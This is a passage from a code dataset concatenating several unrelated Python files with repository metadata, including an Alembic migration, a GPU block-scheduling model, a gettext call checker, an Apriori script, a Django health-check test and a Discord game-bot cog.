] | 10 | 2018-07-06T00:04:23.000Z | 2021-02-26T21:13:20.000Z | src/ggrc_risks/migrations/versions/20170823162755_5aa9ec7105d1_add_test_plan_field.py | HLD/ggrc-core | 9bdc0fc6ca9e252f4919db682d80e360d5581eb4 | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2017-11-11T22:16:56.000Z | 2017-11-11T22:16:56.000Z | # Copyright (C) 2017 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""
Add test_plan field
Create Date: 2017-08-23 16:27:55.094736
"""
# disable Invalid constant name pylint warning for mandatory Alembic variables.
# pylint: disable=invalid-name
import sqlalchemy as sa
from alembic import op
from ggrc.migrations.utils.resolve_duplicates import rename_ca_title
revision = '5aa9ec7105d1'
down_revision = '4e90a7e4907c'
def upgrade():
"""Upgrade database schema and/or data, creating a new revision."""
for table in ["risks", "threats"]:
op.add_column(
table,
sa.Column("test_plan", sa.Text, nullable=True),
)
rename_ca_title("Assessment Procedure", ["risk", "threat"])
def downgrade():
"""Downgrade database schema and/or data back to the previous revision."""
for table in ["risks", "threats"]:
op.drop_column(table, "test_plan")
| 25.666667 | 79 | 0.717532 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 546 | 0.590909 |
633670508ceec1cd4f56068d21ebd73c224ba536 | 16,818 | py | Python | mem_mem/avgblk.py | 3upperm2n/trans_kernel_model | 72a9156fa35b5b5407173f6dbde685feb0a6a3f5 | [
"MIT"
] | null | null | null | mem_mem/avgblk.py | 3upperm2n/trans_kernel_model | 72a9156fa35b5b5407173f6dbde685feb0a6a3f5 | [
"MIT"
] | null | null | null | mem_mem/avgblk.py | 3upperm2n/trans_kernel_model | 72a9156fa35b5b5407173f6dbde685feb0a6a3f5 | [
"MIT"
] | null | null | null | import pandas as pd
import numpy as np
from math import *
import copy # deep copy objects
from model_param import *
#------------------------------------------------------------------------------
# Figure out when to launch another block for current kernel
#------------------------------------------------------------------------------
def Search_block_start(df_sm_trace, current_kernel_id):
"""
Read the sm_trace table, find out all the active blocks on current sm,
look for the earliest start
"""
df_active = df_sm_trace.loc[df_sm_trace['active'] == 1]
if not df_active.empty:
blk2start = df_active['block_start'].max() # find the closest block
df_active_current_kernel = \
df_active.loc[df_active['kernel_id'] == current_kernel_id]
if not df_active_current_kernel.empty:
# find the closest blk for current kernel
blk2start = df_active_current_kernel['block_start'].max()
return blk2start
else:
# when, on current sm, all the blocks are done/de-activated
# warning!!!
return 0.0
#------------------------------------------------------------------------------
# Figure out which sm to start for current kernel
#------------------------------------------------------------------------------
def find_sm2start(sm_trace_list, kern_start):
sm_num = len(sm_trace_list)
AfterPrevKern = False
empSM = 0
# case 1) there are no trace on each sm
for df_sm in sm_trace_list:
if df_sm.empty:
empSM = empSM + 1 # do nothing
if empSM == sm_num:
return 0, AfterPrevKern
# case 2) there are traces: by the time where the kernel starts,
# all the blocks are done already, use sm 0
max_t = 0
for df_sm in sm_trace_list:
cur_max = df_sm.block_end.max()
if cur_max > max_t:
max_t = cur_max
if max_t <= kern_start:
AfterPrevKern = True
return 0, AfterPrevKern
else:
# case 3) : check currently active blocks
df_sm = sm_trace_list[0]
df_activeblk = df_sm.loc[df_sm['active'] == 1]
min_t = df_activeblk.block_end.min()
target_sm = 0
for i in range(1,sm_num):
df_sm = sm_trace_list[i]
df_activeblk = df_sm.loc[df_sm['active'] == 1]
sm_blk_min = df_activeblk.block_end.min()
if sm_blk_min < min_t:
min_t = sm_blk_min
target_sm = i
return target_sm, AfterPrevKern
#------------------------------------------------------------------------------
# model cke function
#------------------------------------------------------------------------------
def cke_model(Gpu, sms_, sm_trace_, kernels_):
# deep copy the input
# we need to return the resource and trace for each sm after modeling
sms = copy.deepcopy(sms_)
sm_trace = copy.deepcopy(sm_trace_)
kernels = copy.deepcopy(kernels_)
kernel_num = len(kernels)
sm_num = Gpu.sm_num
# go through each kernel
for i in range(kernel_num):
kern = kernels[i] # schedule current kernel on the device
kernel_blocks = int(kern.gridDim) # total block for current kern
kern_start = kern.start_ms
# 1) find the which sm to start
# 2) compute whether kernel_start happens before previous kernel ends or not
sm2start, AfterPrevKern = find_sm2start(sm_trace, kern_start)
#---------------------------------------------------------
# Run after previous kernel
#---------------------------------------------------------
if AfterPrevKern:
# deactivate all the previous active blocks
myid = 0
for df_sm in sm_trace:
df_activeblk = df_sm.loc[df_sm['active'] == 1]
# find the row index of active blocks
for index, row in df_activeblk.iterrows():
sm_trace[myid].loc[index]['active'] = 0 # deactivate
sms[myid].Rm(kern) # free the block resource
myid = myid + 1
#---------------------------------------------------------
# Continue current kernel
#---------------------------------------------------------
for bid in range(kernel_blocks):
sm_id = (bid + sm2start) % sm_num
to_allocate_another_block = check_sm_resource(sms[sm_id], kern)
#----------------------------------
# there is enough resource to host the current block
#----------------------------------
if to_allocate_another_block == True:
# deduct resources on the current sm
sms[sm_id].Allocate_block(kern)
#---------------------------------------
# register the block in the trace table
#---------------------------------------
block_start = None
offset = 0.0
# Noted: only the 1st block will adjut the kern_start
if AfterPrevKern and bid < sm_num:
offset = kern_start
# if current sm trace table is empty, start from kernel_start
# else find the blocks that will end soon, and retire them
if sm_trace[sm_id].empty:
block_start = kern_start # (fixed!)
else:
# read the sm_trace table, find out all the active blocks
# on current sm, look for the earliest start
block_start = Search_block_start(sm_trace[sm_id], i) + offset
#block_end = block_start + avg_blk_time_list[i]
block_end = block_start + kern.avg_blk_time
# add the current block info to the current sm
sm_trace[sm_id] = sm_trace[sm_id].append({'sm_id': sm_id,
'block_id': bid,
'block_start': block_start,
'block_end' : block_end,
'batch_id': sms[sm_id].batch,
'kernel_id': i,
'active': 1}, ignore_index=True)
#-------------------------------------------
# There is no more resources to host the blk, consider SM is full now
# we need to (1) decide how many blks to retire
# (2) when to start current blk
if to_allocate_another_block == False:
# find out the active blocks on current sm
df_sm = sm_trace[sm_id]
df_activeblk = df_sm.loc[df_sm['active'] == 1]
df_loc = df_activeblk.copy(deep=True)
cur_activeblk_num = df_activeblk.shape[0]
for ii in range(cur_activeblk_num):
# find out blocks ending soon
blkend_min = df_loc['block_end'].min()
df_blk2end = df_loc.loc[df_loc['block_end'] == blkend_min]
# retire the blocks
for index, row in df_blk2end.iterrows():
sm_trace[sm_id].loc[index]['active'] = 0
sms[sm_id].Rm(kern) # free the block resource
# enough to allocate a current block
if check_sm_resource(sms[sm_id], kern):
sms[sm_id].Allocate_block(kern)
# when prev blks end, current block starts
block_start = blkend_min
# add avgblktime for currrent kernel
#block_end = block_start + avg_blk_time_list[i]
block_end = block_start + kern.avg_blk_time
break # jump out of the loop
else:
# not enough to allocat another block, remove
# Warning: ??? I may just pass
#df_loc = df_sm.loc[df_sm['active'] == 1]
pass
# update the trace table
sm_trace[sm_id] = sm_trace[sm_id].append({'sm_id': sm_id,
'block_id': bid,
'block_start': block_start,
'block_end' : block_end,
'batch_id': sms[sm_id].batch,
'kernel_id': i,
'active': 1}, ignore_index=True)
# end of running blocks for current kernel
#end of kernel iteration
# return the updated sm resource and trace table
return sms, sm_trace
#------------------------------------------------------------------------------
# Find kern time on current sm
#------------------------------------------------------------------------------
def find_kernel_time(df_sm_trace, kern_id):
df_kern = df_sm_trace.loc[df_sm_trace.kernel_id == kern_id]
# min of start time, max of end time
return df_kern.block_start.min(), df_kern.block_end.max()
#------------------------------------------------------------------------------
# Find out kernel runtime by reading the traces from each SM
#------------------------------------------------------------------------------
def Get_KernTime(sm_trace):
kern_dd = {}
kernel_unique_ls = []
for df_sm in sm_trace:
kids = df_sm.kernel_id.unique() # find out all the kernels on current sm
#
# case 1: given the empty dd
if not kern_dd:
for kern_id in kids: # find kernel time for each unique kernel
startT, endT = find_kernel_time(df_sm, kern_id)
kern_dd[kern_id] = [startT, endT]
kernel_unique_ls.append(kern_id)
# case 2: the dd has values
if kern_dd:
for kern_id in kids: # find kernel time for each unique kernel
startT, endT = find_kernel_time(df_sm, kern_id)
if kern_id in kernel_unique_ls:
# compare the min and max for start and end, update
prev_start = kern_dd[kern_id][0]
prev_end = kern_dd[kern_id][1]
cur_start, cur_end = find_kernel_time(df_sm, kern_id)
update = 0
if cur_start < prev_start:
prev_start = cur_start # update
update = update + 1
if cur_end > prev_end:
prev_end = cur_end # update
update = update + 1
if update > 0:
kern_dd[kern_id] = [prev_start, prev_end]
else:
kern_dd[kern_id] = [startT, endT] # add to dd
kernel_unique_ls.append(kern_id)
return kern_dd
#------------------------------------------------------------------------------
# run a single gpu kernel one at a time
#------------------------------------------------------------------------------
def run_gpu_kernel(Gpu, sms_, sm_trace_, kern, kern_id):
sms = copy.deepcopy(sms_)
sm_trace = copy.deepcopy(sm_trace_)
sm_num = Gpu.sm_num
kernel_blocks = int(kern.gridDim) # total block for current kern
kern_start = kern.start_ms
# 1) find the which sm to start
# 2) compute whether kernel_start happens before previous kernel ends or not
sm2start, AfterPrevKern = find_sm2start(sm_trace, kern_start)
#---------------------------------------------------------
# Run after previous kernel
#---------------------------------------------------------
if AfterPrevKern:
# deactivate all the previous active blocks
for df_sm in sm_trace:
df_activeblk = df_sm.loc[df_sm['active'] == 1]
if not df_activeblk.empty:
myid = int(df_activeblk.iloc[0]['sm_id'])
for index, row in df_activeblk.iterrows(): # find the row index of active blocks
sm_trace[myid].loc[index]['active'] = 0 # deactivate
sms[myid].Rm(kern) # free the block resource
#---------------------------------------------------------
# Continue current kernel
#---------------------------------------------------------
for bid in range(kernel_blocks):
sm_id = (bid + sm2start) % sm_num
to_allocate_another_block = check_sm_resource(sms[sm_id], kern)
#----------------------------------
# there is enough resource to host the current block
#----------------------------------
if to_allocate_another_block == True:
sms[sm_id].Allocate_block(kern) # deduct resources on the current sm
#---------------------------------------
# register the block in the trace table
#---------------------------------------
block_start = None
offset = 0.0
if AfterPrevKern and bid < sm_num: # Noted: only the 1st block will adjut the kern_start
offset = kern_start
# if current sm trace table is empty, start from kern_start
# else find the blocks that will end soon, and retire them
if sm_trace[sm_id].empty:
block_start = kern_start
else:
# read the sm_trace table, find out all the active blocks on current sm, look for the earliest start
block_start = Search_block_start(sm_trace[sm_id], kern_id) + offset
block_end = block_start + kern.avg_blk_time
# add the current block info to the current sm
sm_trace[sm_id] = sm_trace[sm_id].append({'sm_id': sm_id,
'block_id': bid,
'block_start': block_start, # add the kern stat
'block_end' : block_end,
'batch_id': sms[sm_id].batch,
'kernel_id': kern_id,
'active': 1}, ignore_index=True)
#-------------------------------------------
# There is no more resources to host the blk, consider SM is full now
# we need to (1) decide how many blks to retire (2) when to start current blk
if to_allocate_another_block == False:
# find out the active blocks on current sm
df_sm = sm_trace[sm_id]
df_activeblk = df_sm.loc[df_sm['active'] == 1]
df_loc = df_activeblk.copy(deep=True)
cur_activeblk_num = df_activeblk.shape[0]
for ii in range(cur_activeblk_num):
# find out blocks ending soon
blkend_min = df_loc['block_end'].min()
df_blk2end = df_loc.loc[df_loc['block_end'] == blkend_min]
# retire the blocks
for index, row in df_blk2end.iterrows():
sm_trace[sm_id].loc[index]['active'] = 0
sms[sm_id].Rm(kern) # free the block resource
# enough to allocate a current block
if check_sm_resource(sms[sm_id], kern):
sms[sm_id].Allocate_block(kern)
block_start = blkend_min # when prev blks end, current block starts
block_end = block_start + kern.avg_blk_time
break # jump out of the loop
else:
# not enough to allocat another block, remove
df_loc = df_sm.loc[df_sm['active'] == 1]
# update the trace table
sm_trace[sm_id] = sm_trace[sm_id].append({'sm_id': sm_id,
'block_id': bid,
'block_start': block_start,
'block_end' : block_end,
'batch_id': sms[sm_id].batch,
'kernel_id': kern_id,
'active': 1}, ignore_index=True)
# return the updated sm resource and trace table
return sms, sm_trace
| 43.012788 | 116 | 0.466821 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6,210 | 0.369247 |
6336e1b7ec75cc9e6881dda4dff8c780539d97ab | 4,322 | py | Python | pychecktext/checktext_parser.py | da1910/pyCheckText | a00738aff3fa20c520343b3d12fa8c87a90e1c65 | [
"MIT"
] | null | null | null | pychecktext/checktext_parser.py | da1910/pyCheckText | a00738aff3fa20c520343b3d12fa8c87a90e1c65 | [
"MIT"
] | null | null | null | pychecktext/checktext_parser.py | da1910/pyCheckText | a00738aff3fa20c520343b3d12fa8c87a90e1c65 | [
"MIT"
] | 1 | 2020-06-05T14:56:10.000Z | 2020-06-05T14:56:10.000Z | import _ast
import ast
from typing import Dict, Union
import os
from pychecktext import teamcity, teamcity_messages
class CheckTextVisitor(ast.NodeVisitor):
def __init__(self, aliases: Dict[str, str] = {}):
self.literal_calls = []
self.expression_calls = []
self.aliases = aliases
self.function_signatures = {
"dgettext": [0, 1],
"dngettext": [0, 1, 2],
"dnpgettext": [0, 1, 2, 3],
"dpgettext": [0, 1, 2],
"gettext": [0],
"ldgettext": [0, 1],
"ldngettext": [0, 1, 2],
"lgettext": [0],
"lngettext": [0, 1],
"ngettext": [0, 1],
"npgettext": [0, 1, 2],
"pgettext": [0, 1]}
for alias, source in aliases.items():
self.function_signatures[alias] = self.function_signatures[source]
def visit_Call(self, node: _ast.Call):
func_object = node.func
if hasattr(node, 'args'):
for arg in node.args:
if isinstance(arg, _ast.Call):
self.visit_Call(arg)
if hasattr(func_object, 'id') and func_object.id in self.function_signatures:
# Get the calling function name, resolve aliases here
if func_object.id in self.aliases:
calling_name = self.aliases[func_object.id]
else:
calling_name = func_object.id
# A call to gettext or one of its aliases, check if we have a literal
called_args = []
message_args = [node.args[index] for index in self.function_signatures[func_object.id]]
if not isinstance(message_args, list):
message_args = [message_args]
has_complex_arg = False
for arg in message_args:
if isinstance(arg, _ast.Constant):
called_args.append(arg.value)
else:
has_complex_arg = True
called_args.append(arg)
call_struct = {
"function": calling_name,
"args": called_args
}
if has_complex_arg:
self.expression_calls.append(call_struct)
else:
self.literal_calls.append(call_struct)
def process_calls(self, source: str):
for call in self.expression_calls:
for index, call_arg in enumerate(call['args']):
if not isinstance(call_arg, _ast.Constant):
source_call = ast.get_source_segment(source, call_arg)
call['args'][index] = source_call
def parse_folder(folder_path: str, alias: Dict[str, Union[str, None]]):
if teamcity:
teamcity_messages.customMessage('Checking tokens in folder {}'.format(folder_path), status='INFO', errorDetails=None)
else:
print("Checking gettext tokens in folder '{}'".format(folder_path))
folder_calls = {}
for subdir, _, files in os.walk(folder_path):
for filename in files:
file_path = subdir + os.sep + filename
if not filename.startswith('.') and file_path.endswith('.py'):
file_calls = parse_file(file_path, alias)
folder_calls[file_path] = file_calls
return folder_calls
def parse_file(file_path: str, alias: Dict[str, Union[str, None]] = {}):
if teamcity:
teamcity_messages.customMessage('Checking tokens in file {}'.format(file_path),
status='INFO', errorDetails=None)
else:
print("Checking gettext tokens in file '{}'".format(file_path))
with open(file_path, 'r') as f:
data = f.read()
try:
tree = ast.parse(data)
except SyntaxError as excinfo:
if teamcity:
teamcity_messages.customMessage("Syntax error whilst parsing file '{}'",
status="ERROR", errorDetails=excinfo.msg)
else:
print("Syntax error in file '{}': {}".format(file_path, excinfo))
return None
treeVisitor = CheckTextVisitor(alias)
treeVisitor.visit(tree)
treeVisitor.process_calls(data)
return {
'literal_calls': treeVisitor.literal_calls,
'complex_calls': treeVisitor.expression_calls
}
| 39.651376 | 125 | 0.571726 | 2,522 | 0.583526 | 0 | 0 | 0 | 0 | 0 | 0 | 554 | 0.128181 |
633d6db47ffd3a0bfb75a0fe45f30235b4e37486 | 834 | py | Python | Apriori/src/main.py | ranery/Courses-only | 8bc1254076c75b55b536498037ff0594a951d18f | [
"MIT"
] | 2 | 2021-03-31T21:46:58.000Z | 2021-04-04T08:59:50.000Z | Apriori/src/main.py | ranery/Courses-only | 8bc1254076c75b55b536498037ff0594a951d18f | [
"MIT"
] | null | null | null | Apriori/src/main.py | ranery/Courses-only | 8bc1254076c75b55b536498037ff0594a951d18f | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
@author : Haoran You
"""
import sys
import data
from Apriori import Apriori
from optparse import OptionParser
optparser = OptionParser()
optparser.add_option('--inputFile', dest='input', help='filename containing csv', default='goods.csv')
optparser.add_option('--minSupport', dest='minS', help='minimum support value', default=0.5, type='float')
optparser.add_option('--minConfidence', dest='minC', help='minimum confidence value', default=0.5, type='float')
(options, args) = optparser.parse_args()
# get dataset
inputFile = None
if options.input is not None:
inputFile = data.dataset(options.input)
else:
sys.exit('No dataset filename specified, system exit!')
# apriori
Apriori = Apriori()
items, rules = Apriori.run(inputFile, options.minS, options.minC)
Apriori.printResults(items, rules) | 30.888889 | 112 | 0.736211 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 281 | 0.33693 |
633d88c667ff815677d77f4463db3ccad4431980 | 8,791 | py | Python | extra/slothclasses/agares.py | Tirithel/sloth-bot | de1f9cc60196d9cd389cdbf38223fa3c35f62eb4 | [
"MIT"
] | null | null | null | extra/slothclasses/agares.py | Tirithel/sloth-bot | de1f9cc60196d9cd389cdbf38223fa3c35f62eb4 | [
"MIT"
] | null | null | null | extra/slothclasses/agares.py | Tirithel/sloth-bot | de1f9cc60196d9cd389cdbf38223fa3c35f62eb4 | [
"MIT"
] | null | null | null | import discord
from discord.ext import commands
import os
from .player import Player
from extra.menu import ConfirmSkill
import os
from datetime import datetime
bots_and_commands_channel_id = int(os.getenv('BOTS_AND_COMMANDS_CHANNEL_ID'))
class Agares(Player):
emoji = '<:Agares:839497855621660693>'
def __init__(self, client) -> None:
self.client = client
self.safe_categories = [
int(os.getenv('LESSON_CAT_ID')),
int(os.getenv('CASE_CAT_ID')),
int(os.getenv('EVENTS_CAT_ID')),
int(os.getenv('DEBATE_CAT_ID')),
int(os.getenv('CULTURE_CAT_ID')),
int(os.getenv('TEACHER_APPLICATION_CAT_ID'))
]
@commands.command(aliases=['ma'])
@Player.skill_on_cooldown()
@Player.user_is_class('agares')
@Player.skill_mark()
async def magic_pull(self, ctx, target: discord.Member = None) -> None:
""" Moves a member to the channel you are in.
:param target: The target member. """
attacker = ctx.author
if ctx.channel.id != bots_and_commands_channel_id:
return await ctx.send(f"**{attacker.mention}, you can only use this command in {self.bots_txt.mention}!**")
if await self.is_user_knocked_out(attacker.id):
return await ctx.send(f"**{attacker.mention}, you can't use your skill, because you are knocked-out!**")
attacker_state = attacker.voice
if not attacker_state or not (attacker_vc := attacker_state.channel):
return await ctx.send(f"**{attacker.mention}, you first need to be in a voice channel to magic pull someone!**")
if not target:
return await ctx.send(f"**Please, inform a target member, {attacker.mention}!**")
if attacker.id == target.id:
return await ctx.send(f"**{attacker.mention}, you cannot magic pull yourself!**")
if target.bot:
return await ctx.send(f"**{attacker.mention}, you cannot magic pull a bot!**")
target_currency = await self.get_user_currency(target.id)
if not target_currency:
return await ctx.send(f"**You cannot magic pull someone who doesn't have an account, {attacker.mention}!**")
if target_currency[7] == 'default':
return await ctx.send(f"**You cannot magic pull someone who has a `default` Sloth class, {attacker.mention}!**")
target_state = target.voice
if not target_state or not (target_vc := target_state.channel):
return await ctx.send(f"**{attacker.mention}, you cannot magic pull {target.mention}, because they are not in a voice channel!!**")
if target_vc.category and target_vc.category.id in self.safe_categories:
return await ctx.send(
f"**{attacker.mention}, you can't magic pull {target.mention} from `{target_vc}`, because it's a safe channel.**")
if await self.is_user_protected(target.id):
return await ctx.send(f"**{attacker.mention}, {target.mention} is protected, you can't magic pull them!**")
try:
await target.move_to(attacker_vc)
except Exception as e:
print(e)
await ctx.send(
f"**{attacker.mention}, for some reason I couldn't magic pull {target.mention} from `{target_vc}` to `{attacker_vc}`**")
else:
# Puts the attacker's skill on cooldown
current_ts = await self.get_timestamp()
await self.update_user_action_skill_ts(attacker.id, current_ts)
# Updates user's skills used counter
await self.update_user_skills_used(user_id=attacker.id)
# Sends embedded message into the channel
magic_pull_embed = await self.get_magic_pull_embed(
channel=ctx.channel, perpetrator_id=attacker.id, target_id=target.id,
t_before_vc=target_vc, t_after_vc=attacker_vc)
await ctx.send(content=target.mention, embed=magic_pull_embed)
@commands.command()
@Player.skills_used(requirement=5)
@Player.skill_on_cooldown(skill_number=2)
@Player.user_is_class('agares')
@Player.skill_mark()
# @Player.not_ready()
async def recharge(self, ctx, target: discord.Member = None) -> None:
""" Recharges someone's first skill by removing its cooldown.
:param target: The target person who you want to recharge the skill for. """
perpetrator = ctx.author
if ctx.channel.id != bots_and_commands_channel_id:
return await ctx.send(f"**{perpetrator.mention}, you can only use this command in {self.bots_txt.mention}!**")
if not target:
return await ctx.send(f"**Please, inform a target, {perpetrator.mention}**")
if target.bot:
return await ctx.send(f"**{perpetrator.mention}, you cannot use this on a bot!**")
if await self.is_user_knocked_out(perpetrator.id):
return await ctx.send(f"**{perpetrator.mention}, you can't use your skill, because you are knocked-out!**")
target_currency = await self.get_user_currency(target.id)
if not target_currency:
return await ctx.send(f"**You cannot recharge the skill of someone who doesn't have an account, {perpetrator.mention}!**")
if target_currency[7] == 'default':
return await ctx.send(f"**You cannot recharge the skill of someone who has a `default` Sloth class, {perpetrator.mention}!**")
confirm = await ConfirmSkill(f"**Are you sure you to reset {target.mention}'s first skill cooldown, {perpetrator.mention}?**").prompt(ctx)
if not confirm:
return await ctx.send(f"**Not resetting it, then!**")
await self.check_cooldown(user_id=perpetrator.id, skill_number=2)
try:
await self.reset_user_action_skill_cooldown(target.id)
except Exception as e:
print(e)
await ctx.send(f"**For some reason I couldn't reset {target.menion}'s cooldown, {perpetrator.mention}!**")
else:
# Puts the perpetrator's skill on cooldown
current_ts = await self.get_timestamp()
await self.update_user_action_skill_two_ts(perpetrator.id, current_ts)
# Updates user's skills used counter
await self.update_user_skills_used(user_id=perpetrator.id)
# Sends embedded message into the channel
recharge_embed = await self.get_recharge_embed(
channel=ctx.channel, perpetrator_id=perpetrator.id, target_id=target.id)
await ctx.send(embed=recharge_embed)
async def get_magic_pull_embed(self, channel, perpetrator_id: int, target_id: int, t_before_vc: discord.VoiceChannel, t_after_vc: discord.VoiceChannel) -> discord.Embed:
""" Makes an embedded message for a magic pull action.
:param channel: The context channel.
:param perpetrator_id: The ID of the perpetrator of the magic pulling.
:param target_id: The ID of the target of the magic pulling. """
timestamp = await self.get_timestamp()
magic_pull_embed = discord.Embed(
title="A Magic Pull has been Successfully Pulled Off!",
timestamp=datetime.utcfromtimestamp(timestamp)
)
magic_pull_embed.description = f"**<@{perpetrator_id}> magic pulled <@{target_id}> from `{t_before_vc}` to `{t_after_vc}`!** 🧲"
magic_pull_embed.color = discord.Color.green()
magic_pull_embed.set_thumbnail(url="https://thelanguagesloth.com/media/sloth_classes/Agares.png")
magic_pull_embed.set_footer(text=channel.guild, icon_url=channel.guild.icon_url)
return magic_pull_embed
async def get_recharge_embed(self, channel, perpetrator_id: int, target_id: int) -> discord.Embed:
""" Makes an embedded message for a recharge action.
:param channel: The context channel.
:param perpetrator_id: The ID of the perpetrator of the magic pulling.
:param target_id: The ID of the target of the magic pulling. """
timestamp = await self.get_timestamp()
recharge_embed = discord.Embed(
title="A Cooldown Recharge just Happend!",
timestamp=datetime.utcfromtimestamp(timestamp)
)
recharge_embed.description = f"**<@{perpetrator_id}> reset <@{target_id}>'s first skill cooldown!** 🔁"
recharge_embed.color = discord.Color.green()
recharge_embed.set_thumbnail(url="https://thelanguagesloth.com/media/sloth_classes/Agares.png")
recharge_embed.set_footer(text=channel.guild, icon_url=channel.guild.icon_url)
recharge_embed.set_image(url='https://media1.tenor.com/images/623500b09831e08eb963bdc7d75797c4/tenor.gif?itemid=20299439')
return recharge_embed
| 46.760638 | 173 | 0.663406 | 8,554 | 0.972377 | 0 | 0 | 5,900 | 0.670683 | 7,743 | 0.880186 | 3,389 | 0.385245 |
633fea310c7ede3fcdb48e65d6529aca3feaa371 | 300 | py | Python | WhatsAppManifest/automator/android/__init__.py | riquedev/WhatsAppManifest | bcbbd48f6f9152024a54172886876d3a725a3a62 | [
"MIT"
] | 15 | 2020-03-11T17:31:12.000Z | 2021-11-19T03:26:09.000Z | WhatsAppManifest/automator/android/__init__.py | riquedev/WhatsAppManifest | bcbbd48f6f9152024a54172886876d3a725a3a62 | [
"MIT"
] | 5 | 2021-03-31T19:43:15.000Z | 2022-03-12T00:18:38.000Z | WhatsAppManifest/automator/android/__init__.py | riquedev/WhatsAppManifest | bcbbd48f6f9152024a54172886876d3a725a3a62 | [
"MIT"
] | 4 | 2020-03-11T01:52:57.000Z | 2021-03-16T04:14:33.000Z | """
Module responsible for all automation related to the device
"""
__author__ = 'Henrique da Silva Santos'
__copyright__ = 'Copyright 2020, WhatsAppManifest'
from WhatsAppManifest.automator.android.phone import AndroidPhone
from WhatsAppManifest.automator.android.contacts import AndroidContacts
| 27.272727 | 71 | 0.826667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 127 | 0.423333 |
6341b0389a7fba7d8c81d28e1d7d34cd6e28e72b | 1,968 | py | Python | threp_example.py | wasupandceacar/threp_fucker | d6879ce613e189131ff994a41d5d828a3e3b527d | [
"MIT"
] | 24 | 2018-02-12T13:44:57.000Z | 2021-12-16T09:49:54.000Z | threp_example.py | wasupandceacar/threp_fucker | d6879ce613e189131ff994a41d5d828a3e3b527d | [
"MIT"
] | 4 | 2018-03-14T12:16:29.000Z | 2021-12-22T12:03:23.000Z | threp_example.py | wasupandceacar/threp_fucker | d6879ce613e189131ff994a41d5d828a3e3b527d | [
"MIT"
] | 3 | 2020-02-01T12:03:38.000Z | 2021-12-15T18:02:32.000Z | from threp import THReplay
if __name__ == '__main__':
# 载入一个replay文件,参数为路径
tr = THReplay('rep_tst/th13_01.rpy')
# 获取rep基本信息,包含机体,难度,通关情况,字符串
# etc. Reimu A Normal All
print(tr.getBaseInfo())
# 获取rep基本信息的字典,包含机体,难度,通关情况,字符串
# 字典的键分别为 character shottype rank stage
# etc. Reimu A Normal All
print(tr.getBaseInfoDic())
# 获取rep每个stage的分数,list,包含一串整数
# etc. [13434600, 50759200, 103025260, 152519820, 230440680, 326777480]
print(tr.getStageScore())
# 获取rep的屏幕移动,list,包含一些字符串
# etc.
# 其中一个字符串:[0 ]→→→→→→→→→→→→→→→→↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↖↖↖↖↖↖↖↖↖↑↑○○○○○○○○○○○○○○○○○○
# 开头括号里的数字表示这是在该stage的第几帧,箭头表示方向,圆圈表示不动
#print(tr.getScreenAction())
# 获取rep的按键记录,list,包含一些子list,每个子list包含60个字符串,代表一秒
# etc.
# 其中一个子list:['→', '→', '→', '→', '→', '→', '→', '→', '→', '→', '→', '→', '→', '→', '→', '→', '↑', '↑', '↑', '↑', '↑', '↑', '↑', '↑', '↑', '↑', '↑', '↑', '↑', '↑', '↑', '↑←', '↑←', '↑←', '↑←', '↑←', '↑←', '↑←', '↑←', '↑←', '↑', '↑', '○', '○', '○', '○', '○', '○', '○', '○', '○', '○', '○', '○', '○', '○', '○', '○', '○', '○']
# 每个字符串记录了这帧按下的方向键,箭头表示方向,圆圈表示没按
# print(tr.getKeyboardAction())
# 获取rep的机签,字符串
# etc. WASUP
print(tr.getPlayer())
# 获取rep的处理落,浮点数
# etc. 0.03
print(tr.getSlowRate())
# 获取rep的时间,字符串
# etc. 2015/02/17 22:23
print(tr.getDate())
# 获取解析错误信息,list,包含一些字典
# etc. 共有三种错误
# 1.length so short error,单面长度过短错误
# 2.frame read error,单面帧数读取错误
# 3.length read error,单面长度读取错误
print(tr.getError())
# 获取rep的总帧数,整数
# etc. 84565
print(tr.getFrameCount())
# 获取rep中按下Z键的帧数的list,帧数从1开始数
# etc. [63, 98, 136]
print(tr.getZ())
# 获取rep中按下X键的帧数的list,帧数从1开始数
# etc. [193, 480, 766]
print(tr.getX())
# 获取rep中按下C键的帧数的list,帧数从1开始数,这个按键从TH128开始记录,TH125及以前无记录
# etc. [1046, 1260]
print(tr.getC())
# 获取rep中按下Shift键的帧数的list,帧数从1开始数
# etc. [1495, 1532, 1568]
print(tr.getShift()) | 28.521739 | 325 | 0.521341 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,393 | 0.804099 |
634233844cc354ce43c07fa8d4b0af235345aaef | 901 | py | Python | web/api/tests/test_health_check.py | marcelomansur/maria-quiteria | 953ac1e2caf69e9f44c670d3c4a69e00fff404e4 | [
"MIT"
] | 151 | 2019-11-10T02:18:25.000Z | 2022-01-18T14:28:25.000Z | web/api/tests/test_health_check.py | marcelomansur/maria-quiteria | 953ac1e2caf69e9f44c670d3c4a69e00fff404e4 | [
"MIT"
] | 202 | 2019-11-09T16:27:19.000Z | 2022-03-22T12:41:27.000Z | web/api/tests/test_health_check.py | marcelomansur/maria-quiteria | 953ac1e2caf69e9f44c670d3c4a69e00fff404e4 | [
"MIT"
] | 69 | 2020-02-05T01:33:35.000Z | 2022-03-30T10:39:27.000Z | import pytest
from django.urls import reverse
class TestHealthCheck:
def test_return_success_when_accessing_health_check(self, api_client, url):
response = api_client.get(url, format="json")
assert response.status_code == 200
assert list(response.json().keys()) == ["status", "time"]
assert response.json().get("status") == "available"
def test_return_forbidden_when_trying_to_anonymously_access_a_restricted_route(
self, api_client
):
url = reverse("gazettes-list")
response = api_client.get(url)
assert response.status_code == 403
@pytest.mark.django_db
def test_return_success_when_accessing_a_restricted_route_with_credentials(
self, api_client_authenticated
):
url = reverse("gazettes-list")
response = api_client_authenticated.get(url)
assert response.status_code == 200
| 34.653846 | 83 | 0.702553 | 852 | 0.945616 | 0 | 0 | 283 | 0.314095 | 0 | 0 | 69 | 0.076582 |
63428481e47a4cce5e89935d6ef0c546574044b9 | 2,768 | py | Python | examples/client-gen/tictactoe/types/game_state.py | kevinheavey/anchorpy | d4cc28365c6adaeaec7f5001fa6b8a3e719b41ad | [
"MIT"
